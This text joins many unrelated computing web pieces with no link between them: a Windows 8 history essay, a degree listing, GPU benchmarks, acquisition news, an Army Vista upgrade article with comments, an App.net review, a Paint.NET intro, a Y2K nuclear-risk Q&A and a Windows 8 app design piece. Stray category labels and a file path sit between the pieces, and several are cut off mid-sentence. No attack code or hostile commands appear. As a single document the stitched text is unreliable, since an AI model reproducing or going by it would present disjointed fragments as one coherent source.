When I look at Windows 8, though, I am reminded more of Windows in the 1980s. Remember that when Windows first came out in 1985, Apple already was shipping the original Macintosh, with a more modern user interface. The first Windows was quite clunky, with a tiled interface instead of overlapping Windows. Windows 2 got a bit better with overlapping Windows, but it was still mainly an add-on rather than its own operating system. Windows/386 got closer, but it wasn't until Windows 3 came in 1990 that it really became an environment that most people could live in. Even then, I heard a lot of complaining about switching between the graphical user interface and the older command-line experience of DOS. (By the way, my history of Windows was in the November 8, 2005 issue, which is online here.)
In some ways, the parallels between Windows 8 and the first version of Windows are striking. Again, Apple has adopted a new user interface faster; in the 1980s it had the mouse and graphical user interface and now it has touch and sensors. Microsoft's first response offers tiled windows. There are a lot of complaints about switching back and forth between the older way of working and the newer one; then it was between DOS and Windows and now it's between the desktop and the newer Windows 8 UI.
As before, the first version is a bit clunky and needs to evolve. While we're used to Windows and Office releases that are years apart, back then, there was much more rapid change. Windows 2.0 and Windows/386 (with overlapping windows and the ability to run multiple DOS applications) came out in June 1988, Windows 3.0 came out in May 1990, Windows 3.0a (with multimedia features) came out in October 1991, Windows 3.1 came out in April 1992, and Windows for Workgroups (which added networking features) came out in October 1992. With Apple offering new features in its operating systems (both iOS and OS X) every year, Microsoft will need to move much faster than the every-three-years cycle it's been on if it hopes to compete.
But it's not just the OS itself. I'd argue that the bigger problem is the same one that really held back Windows in the 1980s: a lack of compelling applications. For years, the one really compelling Windows application was Excel. It wasn't until good Windows word processors—Microsoft Word for Windows and Samna (later Lotus's) Ami Pro—that there was enough reason for people to consider Windows as a primary working environment. Until the word processors, at best, people used a couple of Windows apps, but spent most of their time in DOS. After those applications started to develop, and Word, Excel, and PowerPoint evolved into Office, other developers followed suit and Windows became the default environment for new applications. It was that which helped make Windows the standard.
That's true of the way I expect most people are using Windows 8. There are a few nice new Windows tiled applications that take advantage of the new touch paradigm, but right now, most of them are more limited than their desktop equivalents. A few desktop applications—Office 2013 and Internet Explorer 10 come to mind first—have had minor adjustments to work better with touch, but it's clear that this wasn't the design goal. Microsoft will need compelling new applications to get people to use the new user interface.
Can this happen? Of course. It took Microsoft 10 years (between the shipment of Windows 1 and Windows 95) to come up with all the pieces it really needed to, but the company kept working on it through the late 80s and early 90s. The competitive environment seems much tougher nowadays, however, with Apple much stronger and Google's Android a new, open competitor. Indeed, Microsoft seems to be fighting on more fronts than ever. But then, at the time, Apple and IBM with OS/2 seemed much stronger competitors to Microsoft than they look in retrospect.
All this isn't to say that the new Windows interface will become as successful as the desktop interface was in the day as there is too much competition to know. Still, it is way too early to write it off.
Microsoft Windows,Windows Vista
Microsoft,Windows Vista,Windows 8 | 计算机 |
2015-48/3682/en_head.json.gz/7699 | Masters in Computer Science
Search 90+ Online Degrees and Programs
Guide to Masters in Computer Science Degrees
While students will focus much of their education on programming languages, computer science also focuses on how computers process and interpret data in addition to creating data structures or models. We have listed just a few of some of the highest-rated online CS programs so use the search widget to the left to find more schools and programs for this degree or other related degrees. Masters in Computer Science
American Sentinel University – One of the leading online technology schools in the nation, American Sentinel’s online Masters in Computer Science is fully accredited and prepares students both technically and by teaching leadership and management skills. This program expands upon your foundation in computer science and teaches more complex principles and strategies. As such, a Bachelor’s Degree is required in order to enroll in this program. MS in Information Systems
MS in IT: Information Security
MS in IT: Software Engineering
Walden University – Walden University is one of the largest providers of online education and takes a practical approach when developing its courses. Its accredited programs offer hands-on exercises that draw students directly into their education and helps students visualize complex concepts. Walden has three Masters in Computers Science degrees available: Software Engineering, Information Security, and Information Systems. MBA in Computer Science
Northcentral University – The MBA in Applied Computer Science program from Northcentral University is a fully online accredited degree designed to incorporate both business management skills and computer science masters level courses in order to create students who are prepared for leadership positions dealing with computers and technology. Moreover, this program can be completed at a pace that is comfortable to you. MS in Computer Science
New Jersey Institute of Technology – NJIT is a leading source for accredited degree programs focused on the computer industry. NJIT teaches practical lessons and relevant techniques that fit in with today's latest technological advances. This helps students obtain an education they can use immediately upon graduation. NJIT has an online program for a Masters of Science in Computer Science degree that can be completed in under two years. MS in Computer Info Systems
MS/CIS – Database Mgmt
MS/CIS – IT Mgmt
MS/CIS – Security
Boston University – The online masters in computer science or computer information science from Boston University are fully accredited online courses by a well-respected national university and allow students to specialize based on their career focus. BU has several Masters of Computer Science degrees available including a MS in Computer Info Systems, MS/CIS in Database Management, MS/CIS in IT Management, and a MS/CIS in Security. PhD in Computer Science
PhD/CompSci – Emerging Media
Colorado Technical University – These online PhD in computer science programs from Colorado Technical University can be completed in 3 years, and prepares students to not only be leaders in the field, but advance the field of computer science. CTU has two accredited Computer Sciece degrees available through online courses at the doctorates level: Computer Science and Emerging Media. Click here for more Computer Science Degree Programs…
What is Computer Science?
Do you enjoy working with computers and learning about new technologies? Are you Internet savvy and have a knack for troubleshooting and diagnosing IT problems? With a degree in computer science, you’ll be able to apply your interests in a number of exciting and rewarding career options. A computer science degree comes with many benefits, including higher starting salaries and advanced levels of responsibility.
Computer science is a highly sought after degree. As technology continues to advance, so does the demand for qualified computer scientists. With a degree in computer science, you’ll be prepared to secure a position as a highly-skilled programmer, Web developer, and other IT-related occupations.
If you’re interested in computers and other forms of technology, pursuing a computer science degree is a good place to start. You can earn an associate, bachelor, master, and even a doctoral degree. Depending on your goals and skill level, going back to school will help you move forward in your career or start a new career path.
Computer science is not just programming. In fact, computer science covers a wide spectrum of areas including web design, graphics, multimedia, software engineering, and many other fields. In short, computer science is a discipline that involves the understanding and design of computers and computational processes. The construction and analysis of algorithms and data structures are fundamental aspects of computer programming and computer science. When you put this all together, computer science is a fast-moving, exciting field with unlimited potential.
And computer science is not just for “techies” or sophisticated computer users. Anyone with an interest in computers and technology can major in this field. As long as you have a passion for the subject and a willingness to learn, computer science will help you achieve your high-tech dreams.
What master degrees are available for computer science careers?The term "computer science" can refer to the specific major or the general field of computer science. The latter can be applied to several jobs within the technology industry, including positions in computer security, server and network management, and software engineering. Fortunately, several degrees are available in these majors, making it easy to further your career in this field:Master's Degrees in Computer ScienceMaster's Degrees in Software EngineeringMaster's Degrees in Computer and Information SecurityMaster's Degrees in Database and Network SystemsMaster's Degrees in Information SystemsMaster's Degrees in IT Management
What to Expect from a Graduate-Level Computer Science Program?
The level of education you wish to pursue will determine the type of coursework you’ll be required to complete. At the graduate level, you’ve already completed your general education requirements as well as most entry-level computer and technology courses. Now you’re ready to take on more advanced courses in your field with the option to specialize in a particular area of study such as:
Computer and Network Security
Robotics and Computer Vision
Mobile and Internet Computing
You’ll acquire a broad range of skills such as:
Expertise in your chosen area of computer science.
Programming and software development skills.
Knowledge of mathematical algorithms.
The ability to recognize and solve computational problems.
Some schools require students to complete an internship in addition to coursework. Internships provide the opportunity to gain experience and develop your talents. If you’re going to school while taking classes full or part-time, you might be able to shadow a co-worker who works in a position of interest. The more opportunities you have to network and connect with others in the field, the better your chances of advancing your career.
Popular Careers for Computer Science Majors
With a master’s degree in computer science, you qualify for a number of career options. Jobs in computer science are expected to grow faster than average for all occupations, according to The Bureau of Labor Statistics. In fact, prospects for qualified computer scientists and programmers should be excellent, especially those with advanced degrees.
Computer science is a growing field with a wide range of career opportunities. Once you have your master’s degree, it’s time to start exploring your options. O*NET OnLine provides comprehensive occupational data that includes a number of in-demand computer science careers including:
Computer and Information Systems Managers: Plan, direct, or coordinate activities in such fields as electronic data processing, information systems, systems analysis, and computer programming.
Database Architects: Design strategies for enterprise database systems and set standards for operations, programming, and security. Design and construct large relational databases. Integrate new systems with existing warehouse structure and refine system performance and functionality.
Web Administrators: Manage web environment design, deployment, development and maintenance activities. Perform testing and quality assurance of web sites and web applications.
Engineers: Design and develop solutions to complex applications problems, system administration issues, or network concerns. Perform systems management and integration functions.
Software Developers: Research, design, develop, and test operating systems-level software, compilers, and network distribution software for medical, industrial, military, communications, aerospace, business, scientific, and general computing applications.
Video Game Designers: Design core features of video games. Specify innovative game and role-play mechanics, story lines, and character biographies. Create and maintain design documentation. Guide and collaborate with production staff to produce games as designed.
Online Computer Science Programs – How Do They Work?
If you’re certain that a graduate degree in computer science is your ticket to a more rewarding career, it’s time to consider what and where you want to study.
Online computer science programs for graduate students are designed for individuals who want to continue working while getting their degree. By taking classes online, you can finish your degree at your own pace when it’s convenient for you. Many accredited schools now offer online computer science programs that meet the highest standards of educational excellence. Before you apply to an online computer science program, make sure the school is accredited and courses offered are transferable to other colleges and universities.
With a graduate degree in computer science, you have a broad range of opportunities ahead of you. Computer science is an exciting field with tremendous potential. You can work in government, the non-profit sector, education, and many other types of businesses. Take this opportunity to develop new skills, improve existing ones, and advance your career.
Search Online Degrees
Technology (All)
Engineering Technologies
Game Software Development
- Select All Degrees - Associate's
Campus & Online Campus Online Search Online Degrees
Campus & Online Campus Online Related Degree Programs
Masters in Computer Science Masters in Computer Engineering Masters in Computer Security Masters in Databases Masters in Media Design Masters in Info Systems Masters in IT Masters in Networks Masters in Programming Masters in Software Engineering Masters in Technology Mgmt Student Library
Career Opportunities With a Computer Science Degree
What is the Average Salary With a Computer Science Degree?
on November 16, 2010 Most Popular
Black Ops Screenshot Gallery
Testing Methodology
1680x1050 - Gaming Performance
CPU Scaling - Core i7 9xx
What Works and What Doesn't?
At 1680x1050 we found that the Radeon HD 5770 was able to average 61fps with a minimum of 41fps, which we considered playable. Below that there were half a dozen slower graphics cards - the GeForce GTS 450, for example, delivered playable frame rates but sudden drops in performance were occasionally noticeable.
Surprisingly, the old Radeon HD 4890 performed poorly. Averaging just 50fps, it was 2fps faster than the Radeon HD 4850 but both cards occasionally dropped to just 30fps and the lag was quite noticeable. The GeForce 9800 GT averaged 42fps and really struggled with intense scenes, while the current-gen Radeon HD 5670 was as always a disappointment.
Looking beyond the Radeon HD 5770 it was all smooth sailing. The old GeForce GTX 260 managed an average of 70fps and a minimum of 52fps, while the GeForce GTX 275 was significantly faster with an average of 84fps. The Radeon HD 5850 also performed well averaging 89fps, though it occasionally dipped down to a minimum of just 52fps.
At the top of the scale we have the brand new GeForce GTX 580 with an average of 123fps, where we suspect at this resolution it found the limits of our overclocked Core i7 processor. The GeForce GTX 480 was on average just 2fps slower, though the minimum recorded frame rate was 17fps slower. The dual-GPU Radeon HD 5970 is rarely seen performing well at lower resolutions but with an average of 117fps we have nothing to complain about this time. | 计算机 |
It isn’t too much of a leap to suspect that other companies besides Oracle gave some thought to acquiring Eloqua. The marketing software concern for which the software giant will pay $871 million might have also made a logical fit at Salesforce.com, though Salesforce might have had to take on some debt to pay that price.
Anyway, there’s speculation that today’s deal for Eloqua may amount to a starting gun for a new round of acquisitions in the cloud software space. In a note to clients today, Karl Keirstead, an analyst with BMO Capital Markets, argues that Salesforce may answer Oracle with some acquisitions of its own.
“In our view, the deal is a modest net negative for Salesforce.com, making it incrementally tougher for them to pick off Oracle’s Siebel client base,” Keirstead wrote this morning. He also believes that about 50 percent or more of Eloqua’s customers are also Salesforce.com customers.
That might spur Salesforce into action on the acquisition front, he says. Having already made significant acquisitions of Radian6 and Buddy Media in the last two years, Salesforce might move on two privately held cloud-based companies in the marketing field.
One is Marketo, a fast-moving company that specializes in revenue performance management. It raised $50 million in a Series F round led by Battery Ventures last year, bringing its total capital raised to $108 million. Its other investors include Institutional Venture Partners, InterWest Partners, Mayfield Fund and Storm Ventures.
Another possible target for Salesforce, Keirstead argues, is HubSpot, a social media marketing outfit based in Cambridge, Mass. It raised $35 million in a fifth round of funding last month. The round brought its total capital raised to about $101 million, and Salesforce had invested in earlier rounds. Its other investors include Google Ventures, Sequoia Capital, General Catalyst Partners, Matrix Partners, Altimeter Capital and Cross Creek Capital.
The point, Keirstead says, is that Salesforce will seek to build its own “marketing cloud” offering. Of course, Salesforce doesn’t have the financial flexibility that Oracle does. It has only $1.4 billion in combined cash and short- and long-term investments as of the close of its most recent quarter. That’s almost pocket change compared to Oracle’s $34 billion as of the quarter reported earlier this week.
Meanderings of one who is lucky enough to have her avocation be her vocation.
2000 columns
How many columns does the largest table you've ever worked with contain? The current project I'm working on has 1 table with almost 2000 columns (and it's likely to add more!). This is the most highly denormalized design I've ever encountered and there's something about it that makes the performance optimizer in me cringe. But, the statisticians that have to munch and crunch this data in SAS tell me this format best suits their needs (based on similar designs used successfully in previous projects).I think I'm really more concerned about the work that has to be done to populate these columns as most of the columns contain aggregations or formulations of some sort or another. So, perhaps it's not the number of columns that really is niggling at me as it is everything that must occur to produce the values contained in a single row (it's a lot).What's your experience? Did the number of columns help, hinder or make no difference in the design and performance of the application that used such wide tables? This phase of the pro | 计算机 |
99 comment(s) - last by Dfere.. on May 29 at 8:50 AM
The Army has decided to upgrade all of its computers, like those shown here (at the NCO Academy's Warrior Leaders Course) to Windows Vista. It says the adoption will increase its security and improve standardization. It also plans to upgrade from Office 2003 to Office 2007. As many soldiers have never used Vista or Office '07, it will be providing special training to bring them up to speed. (Source: U.S. Army)
Army will upgrade all its computers to Vista by December
For those critics who bill Microsoft's Windows Vista a commercial failure for failing to surpass Windows XP in sales, and inability to capitalize in the netbook market, perhaps they should reserve judgment a bit longer. Just as Windows 7 hype is reaching full swing in preparation for a October release, the U.S. Army announced that like many large organizations, it will wait on upgrading to Windows 7. However, unlike some, it is planning a major upgrade -- to Windows Vista.
The U.S. Army currently has 744,000 desktop computers, most of which run Windows XP. Currently only 13 percent of the computers have upgraded to Windows Vista, according Dr. Army Harding, director of Enterprise Information Technology Services. It announced in a press release that it will be upgrading all of the remaining systems to Windows Vista by December 31st. The upgrade was mandated by a Fragmentary Order published Nov. 22, 2008.
In addition to Windows Vista, the Army's version of Microsoft's Office will also be upgraded. As with Windows, the Army is forgoing the upcoming new version -- Office 2010 -- in favor to an upgrade to Office 2007. Currently about half of the Army's computers run Office 2003 and half run Office 2007.
The upgrade will affect both classified and unclassified networks. Only standalone weapons systems (such as those used by nuclear depots) will remain unchanged. Dr. Harding states, "It's for all desktop computers on the SIPR and NIPRNET."
Army officials cite the need to bolster Internet security and standardize its information systems as key factors in selecting a Windows Vista upgrade. Likewise, they believe that an upgrade to Office 2007 will bring better document security, and easier interfacing to other programs, despite the steeper learning curve associate with the program (which is partially due to the new interface, according to reviewers).
Sharon Reed, chief of IT at the Soldier Support Institute, says the Army will provide resources to help soldiers learn the ropes of Windows Vista. She states, "During this process, we are offering several in-house training sessions, helpful quick-tip handouts and free Army online training."
The U.S. Army will perhaps be the largest deployment of Windows Vista in the U.S. Most large corporations keep quiet about how many Windows Vista systems versus Windows XP systems they've deployed. However, past surveys and reports indicate that most major businesses have declined to fully adopt Windows Vista. Likewise, U.S. public schools and other large government organizations have only, at best, partially adopted of Vista.
RE: big security hole
DOOA
Big security hole(s)As long as IT departments want the ease of support Microsoft will have security holes; remote assistance, remote desktop, scripted registry edits, automatic updates, etc. are all for ease of support. They also make an OS more vulnerable.Check out QNX and why it is a secure OS. The QNX systems I set up have lasted longer than the hardware they run on and require no updates. Granted they don't have all the bells and whistles, but that is the trade off.As for missing the pointI have seen no posts recognizing Microsoft's misguided UI changes.Why is there such a big learning curve from Office 2003 to 2007? Because the new features were not an upgrade, they were the focal point. This is a bad idea in an office environment; let people continue with the old menus unchanged and add the features to them. I hate seeing the productivity loss in my employees as they train and discuss how to do things in Office 2007 they have already been doing for four years with Office 2003. Parent
Master Kenobi
quote: I hate seeing the productivity loss in my employees as they train and discuss how to do things in Office 2007 they have already been doing for four years with Office 2003. There's a difference between knowing how to do something and memorizing a series of clicks. Your employees are exhibiting the latter if they couldn't figure it out on the new system in 24 hours. Parent
Windows 7 to Offer Better Hyper-Threading Support
Study: 83 % of Businesses Won't Deploy Windows 7 Next Year
Companies Adopt "Just Say No" Policy On Vista, Wait For Windows 7
Vista Fails to Improve on Windows XP's Opening Act | 计算机 |
The Dalton Caldwell blog post-inspired App.net has been hatching plans to take on Twitter with its pay-for model for weeks now. At last report, the platform was well short of its $500k goal, but over the last week, the hype and interest was enough to tip App.net over the edge ahead of its deadline.
“Thank you for believing,” Caldwell wrote on Saturday. “I know in my heart that what made join.app.net succeed was your willingness and openness to give App.net the benefit of the doubt, to read our github documentation, to ask to participate in the alpha, to write blogposts in our support. Thank you.”
Now, the alpha version is up and running.
App.net’s interface is, to summarize, bare bones. You have a mere four landing pages you can check out: Your personal stream (posts from those you’re following), your posts, mentions, and the global feed. It’s certainly more sparse than Twitter, both in what and how you navigate, and its looks. While you have a Facebook-like profile page complete with a personal picture and cover photo, the rest of the site is quite stark.
And front and center, in big, bold, plain type, is a export tool for grabbing all of your App.net-posted data.
There’s a lot of work to be done, clearly, so plenty is going to fall onto the “what’s missing” list, but that’s to be expected. That said, let’s dive in.
Instead of 140 characters, you get 256. You can reply to other people’s posts (which a small handful are referring to as “appdates”), but there are no “retweet” or favorite options. You can select and view individual posts for backlinking purposes, which is incredibly helpful when using content for news breaking reference. It can probably go without saying that multimedia features like sharing photos and videos haven’t been added to App.net, but the developer community is so enthused about the platform that the building is coming fast and furious.
Which brings us to a quick note on all the building that’s happening around App.net. Much of the reason for starting App.net in the first place revolved around how platforms exist and interact with their third-party developer ecosystems. Twitter’s continued distancing between itself and outside developers was a big part of the inspiration. So it’s only fitting that much of the discussion on the alpha site revolves around the third-party community.
Web and mobile apps are in the works, as are desktop and browser extensions. You can check out the in-progress catalogue over at Github. And there are a few fun tools already at your disposal, like this app that finds your Twitter friends already using App.net, and this one that shows an endless stream of posts as they’re published, in real time.
There are a few problems that come with alternative social networks. The main one, of course, is building the userbase. As it can be assumed, Twitter’s numbers are far greater than App.net’s… obviously. And the fact that there’s no native way to find people can make diving in a little intimidating. You’re just sort of thrown in the mess, although you can use the aforementioned tool that helps you find Twitter users you know using the application to help out.
The other intimidating thing about jumping into App.net is the community – or rather, it can be intimidating. Think about the type of people interested in paying at least $50 to start using a real-time communication application – so yes, it’s pretty tech-oriented. There’s a lot of developer-speak and a lot of App.net-speak. It’s pretty narrow.
To be fair, this means that the obnoxious drivel that Twitter often dissolves to hasn’t hit the site (at least not yet). It’s a relief not to be flooded with constant celebrity news and pictures of food, if we’re being honest.
The other element that hasn’t invaded App.net (again, yet) are spambots. The price gate is certainly helping, as is its just-launched status, although there’s no chance the platform will be able to remain spam free. Regardless, it definitely shouldn’t dissolve into the massive cesspool of fake users that has engulfed Twitter’s basement.
App.net is ambitious and exciting, but it’s not a solid bet quite yet. There are also already rumors that there will be a free tier of App.net, and I’d certainly suggest waiting until we hear more on that.
As it stands, it’s interesting to be part of the early crew. And if you ever wished you could have been a part of the early Twitter machine and all the user-sourced development that happened way back when, then ante up that $50 and come on in. Otherwise, wait until there’s more outside app integration and native built-in controls.
The larger question, of course, is: does App.net stand a chance? It’s hard to say yes, but given Twitter’s fickle heart these days, it actually seems possible. I don’t want to beat a dead horse here, but Twitter isn’t the company that it used to be; it’s priorities are shifting. We can criticize and yell about it, but if Twitter wants to go ahead and become a media company (and it’s in a really good position to do just that), then that’s Twitter’s prerogative — even if it frustrates core users in doing so. That means the timing is right: We have this brief moment where real-time communication is important and popular and where the largest player to date appears to be creating some market space. Paying for apps is a hard hurdle to cross, but it could deliver us from many of the issues our social networks have trapped us into. Get our Top Stories delivered to your inbox: | 计算机 |
By Dave Johnson, PCWorld
I routinely use high-powered photo editing programs like Adobe Lightroom, Adobe Photoshop, and Corel Paint Shop Pro. But you can get away with spending a lot less on photo editing software. You can spend nothing at all, in fact. In the past I've mentioned GIMP--a popular free, open source program. This week, I'll show you how to get started with Paint.NET as well.
Paint.NET got its start as a senior design project at Washington State University, where it was envisioned as a replacement for the Paint program in Windows. It has evolved significantly since then, though. It remains free, and today has all the basic rudiments of photo editing programs, like layers, effects, and even support for Photoshop-like plug-ins. You can download the latest version of Paint.NET from PCWorld, but you'll want to bookmark the official Paint.NET Web site as well, since there are forums, tutorials, and plug-ins available there. (You can also get to the Web site from Paint.NET's help menu.) A Quick Tour
The interface should look pretty familiar to anyone who has used a program like Photoshop or Paint Shop Pro. Nothing, though, is locked in place. The standard toolbar, for example--usually located on the left side of the screen--can be moved around anywhere in the program window. In fact, if you don't maximize the Paint.NET window, you can drag toolbars and tool palettes out of the program window completely.
The toolbar has all the basics. You'll find selection tools, a magic wand, and a clone tool | 计算机 |
Miro Video Converter
Miro Community
Universal Subtitles
Using Miro
Miro Internet TV Blog
The Free Beauty Squadron
October 1st, 2007 by Nicholas Reville
I’ve been thinking for a long time about one of the key issues that hurts adoption of open-source software: user interface. Open-source software projects tend to be initiated and built exclusively by programmers and their focus usually lies, as it should, with core features and technology. But a project that is exclusively driven by programmers usually won’t have an elegant user interface.
Here’s another way to look at it: you can build good, useful software without having good interface, but you can’t build a good interface without having software. So a programmer can decide to start building something that’s useful to some folks and build momentum from there. But while a designer can decide to design a great UI, it won’t do a single thing until there’s some software behind it. I was reminded of this issue by the launch last week of Pixelmator. It’s a Mac photo editing application with a beautiful user interface. The Pixelmator website proclaims: “Just like your beloved Mac OS X, Pixelmator is also built on open source. It uses a very sophisticated foundation to provide you with the most powerful image editing tools available. More than 15 years of development have gone into Pixelmator.” (The headline above that section says “Pixelmator Loves Open Source”– apparently a fleeting love since Pixelmator itself is not open.)
What’s notable is that Pixelmator has created an excellent, but closed, user interface that uses open-source image manipulation code (ImageMagick). There’s no reason why those of us who care about free and open source software shouldn’t be able to mount similar efforts to bring great user interfaces to more open-source projects, while, of course, keeping everything open.
So here’s the concept that I’ve been pondering for a few months: what if there was a mini-organization that would hire a great interface designer to work with different open-source projects for 2 months at a time developing improved interfaces and user experiences? In just couple years, with a single designer, you could propel adoption of a whole bunch of wonderful open-source software.
Here’s how a Free Beauty Squadron might work. A volunteer committee of experts asks projects to apply, explaining why they are a good candidate for an overhaul and what they hope to accomplish. When a project is selected, a paid designer flies out to meet one or more team members in person and begins developing a plan. Over a 6 week period, the designer creates mockups and interfaces flows for a new user experience, all in consultation with the coders. When the designer is done, the project has graphic files, documentation of a new UI, and an implementation plan to quickly or gradually put the new interface in place. The designer reserves 2 weeks for future consultation with the project as issues inevitably arise during implementation. The committee then sends the designer to their next project. Let me acknowledge four big caveats in one sentence before the whole idea gets nit-picked by smart-alecky haters: (1) we don’t know how | 计算机 |
issue 315 - August 1999
To view a large version click on the image above.
What is the origin of the millennium bug?
Programmers in the 1960s decided to conserve computer memory by using only two digits to designate the year in computers’ internal clocks, with the first two digits assumed to be 19. Unless corrected, microchips and systems may misinterpret year 2000 as 1900 and malfunction. The latest estimates expect at least two per cent of all microchips to malfunction when the date rolls over from 99 to 00.
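A compressed sketch of the arithmetic behind that decision, and of the "windowing" trick many remediation projects used instead of widening every date field:

```python
# Sketch: two-digit years break interval arithmetic at the century rollover.
def years_between(start_yy, end_yy):
    # what much legacy code effectively did: assume an implicit "19" prefix
    return end_yy - start_yy

print(years_between(65, 99))   # 34  -- correct: 1965 to 1999
print(years_between(65, 0))    # -65 -- wrong: the year 2000 is read as 1900

# A common fix short of storing four digits: pivot-based windowing.
def expand(yy, pivot=30):
    return 2000 + yy if yy < pivot else 1900 + yy

print(expand(0), expand(99))   # 2000 1999
```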
What kind of computers are vulnerable?
The Y2K (Year 2000) problem primarily affects two kinds of equipment: mainframe computer systems run by big institutions or businesses; and microchips, or ‘embedded processors’. There are an estimated 15 billion microchips worldwide, embedded in everything from smoke detectors to sewerage systems, alarms to automobiles.
The essence of the Y2K flaw is that it is unpredictable. It could make a computer stop dead or it could cause havoc by producing invalid data which is not immediately detected. (Watch your pay packets carefully over the next year...) The failure of just one chip can set off a chain of events, bringing down whole systems.
Do nuclear weapons rely on computers?
Nuclear weapons and their associated command, control and communications systems are completely dependent on computers and microchips. The US and Russia in particular monitor each other using interdependent radar, satellite and communications systems. The weapons themselves use millions of microchips, and over the years the military has tried to reduce costs by using ‘commercial-off-the-shelf’ chips (COTS) which may well be susceptible to the Y2K problem. The only way to make sure a system is Y2K compliant is to check it laboriously line by line, chip by chip.
But surely that’s what the military are doing, aren’t they?
They have been trying but failing. The US Naval Audit Service admitted on 4 January this year that ‘the Strategic Systems Programs will not meet the Department of Defense and Navy Target Completion Dates for their mission support and infrastructure.’ According to Brookings Institute analyst Bruce Blair, two systems, which are the primary mode of communications with ballistic missile submarines, will not be Y2K compliant by the turn of the century. As of June 1999 264 mission-critical systems in the US Department of Defense are still not yet Y2K compliant.
Why on earth can’t they get it together?
They’ve got huge problems. Much of the software currently in use is based upon virtually extinct programming languages that hardly anyone understands any more. The subsystems they have to test are so numerous and varied that they may not even be able to locate them. And even when they do, the microchips may have a date-specific program written into them that can’t be amended. Dry-run testing all systems and sub-systems in every conceivable scenario is fantastically time-consuming.
But if they’d checked it all we’d be safe?
Even if the military systems were completely error-free we would not be out of the woods. Any interface with another system could introduce bad data and wreak havoc. For example, US communications from Strategic Command to its nuclear submarines in the Mediterranean travel partly over the Italian telephone system.
Could a computer failure automatically launch a nuclear missile?
Unlikely. Most nuclear missiles have built-in security systems to avoid accidental launches. The missile would probably disable itself.
If the military computer systems collapse there could be false early-warning information or a blank-out, leaving both sides ignorant of what the other is doing. A malfunctioning system could wrongly suggest that an enemy missile had been launched and cause a commander to authorize a missile launch in response.
This almost happened on 3 June 1980 when US nuclear command centres showed that Soviet missiles had been launched. Bomber crews started their engines and Minuteman missiles were readied for launch. Technicians recognized this as a false alarm only just in time. The malfunction was traced back to the failure of one microchip costing 46 cents.
But that was during the Cold War...
US insistence on retaining the right to launch a pre-emptive strike has led Russia to overturn its previous policy of ‘no first use’. Both Russia and the US have a policy of launching nuclear missiles ‘on warning’. Missiles are kept on high-alert status in order that they could be fired as soon as an enemy launch was detected. Of the 36,000 nuclear weapons remaining in the world 5,000 sit in silos on high-alert status. These missiles can be fired in about 15 minutes and reach their target cities in another 30 minutes.
But surely missiles are no longer targeted on foreign cities?
It is true that all the main nuclear powers (the US, Britain, France, Russia and China) have agreed to stop targeting ‘enemy’ cities. But retargeting would only take ten seconds. And in the event of a computer malfunction, some experts argue that a missile could revert to its last targeting instructions.
Aren’t most nuclear weapons carried on submarines these days?
Yes, and these submarines, powered by nuclear reactors, are completely dependent on computers, unable even to raise a periscope without them. In one recent case involving a British Trident submarine, the nuclear-power plant was accidentally turned off and the submarine started to plummet to the ocean floor. Luckily, the reactor was turned back on before the submarine imploded from the pressure of being beyond its maximum design depth. But if Y2K problems caused the glitch there might be no way of restarting the reactor.
You only mention Britain and the US. What about other nuclear powers?
There is worryingly little information about their nuclear checking. But what there is suggests India, Pakistan, Israel, France and China are way behind the US and Britain in their preparations for the general Y2K problem, with China and Pakistan lagging farthest behind. US intelligence sources testified to Congress: ‘Its late start in addressing Y2K issues suggests Beijing will fail to solve many of its Y2K problems in the limited time remaining, and will probably experience failures in key sectors such as telecommunications, electric power and banking.’ But China is less of a worry because it does not keep its nuclear weapons on high alert and has a ‘no first use’ policy.
What about Russia?
Until February 1999 Russia was denying that its nuclear forces could face Y2K difficulties. But according to Russian scientists now working in the US, the financially starved Russian military and its antiquated computer systems are bound to be prone to failure. Since then Russia has acknowledged it has a problem and asked for financial and technical assistance. The chair of the State Communications Committee, Aleksandr Krupnov, said recently: ‘Who knows if the country will be ready? I can’t give any guarantees.’
The most worrying element is Russia’s nuclear control system, called ‘Perimeter’. According to Jane’s Intelligence Review, if Moscow looked like it was under attack, or even if command links to key Russian leaders were interrupted, Perimeter would automatically launch a communications missile that would in turn transmit the codes to launch thousands of nuclear weapons.
But surely if the US and the Russians know about the Y2K problem they will realize any warnings on New Year's Eve are likely to be false alarms?
The two countries were laying plans for a jointly operated early-warning centre that might help this. But when war in the Balkans broke out Russia broke off co-operation on this. Besides, 1 January 2000 is not the only date to worry about. There are other dates on which systems could malfunction.
Such as?
Such as 21 August 1999, when the Global Positioning System (whose satellite signals many receivers rely on for precise time) reaches the end of its 1,024-week counter and rolls over to week zero, with possibly calamitous results for any receivers that haven't been properly configured.
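The GPS issue is separate from the two-digit-year flaw: the legacy navigation message carries only a 10-bit week counter, so it wraps after 1,024 weeks. A sketch of the arithmetic:

```python
# Sketch: the legacy GPS week number is 10 bits, so it rolls over every 1,024 weeks.
MODULUS = 2 ** 10                  # 1,024 weeks, roughly 19.6 years

def broadcast_week(true_week):
    return true_week % MODULUS

print(broadcast_week(1023))        # 1023 -- the week ending 21 August 1999
print(broadcast_week(1024))        # 0    -- a receiver assuming the count only grows
                                   #         suddenly jumps back about 19.6 years
```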
So what do we do?
Go to the Action Section to find out.
Developing Business Applications For Windows 8
The arrival of Windows 8 and Windows Server 2012 will bring its tablet inspired user interface to the mainstream. While many application types will readily benefit from the new design, developers of traditional business applications may wonder how their applications will fare. What might not be as readily apparent is that Metro represents a shift in mental design philosophy as much as a new graphical theme.
This is an important distinction because it shows how Metro can be relevant to all users, not just those with tablets or touchscreen based devices. To explore some of the design decisions being made when embracing Metro, Microsoft's Robert Green introduces Nadine Fox of Macadamian. Together they profile an application they developed for Metro which is representative of a traditional line of business application, a business expense management system.
One of the themes Green repeatedly mentions is "content over chrome". The results of this convention are apparent in the look of the application. While the application is running under Windows 8 and driven by a mouse, the traditional menu bar and the newer ribbon are both gone. Instead, the primary content-- expense report items-- are the focus. The only tie to the traditional application is the "App Bar" which appears based on context when certain application items are selected. Otherwise it hides off screen, to minimize user distraction.
To further emphasize the content over chrome mantra, even the traditional message boxes are discouraged. Instead notifications from the application are placed inline with the fields that require the information:
Green also demonstrated some of the other Windows 8 specific features his sample application could take advantage of, including the sharing facility. This provided access to sharing via email, Twitter, or sending to quick note.
In watching the presentation, one is left with the impression that there indeed a viable path forward for business applications under the Windows 8 style UI, but they will require a new approach in their presentation and design. The challenge facing developers will be in obtaining the necessary time and artistic design resources to take advantage of the new look.
Community comments
This won't work (Adam Nemeth)
First off, Green (or MS) hired a full design firm to design the application's user interface.

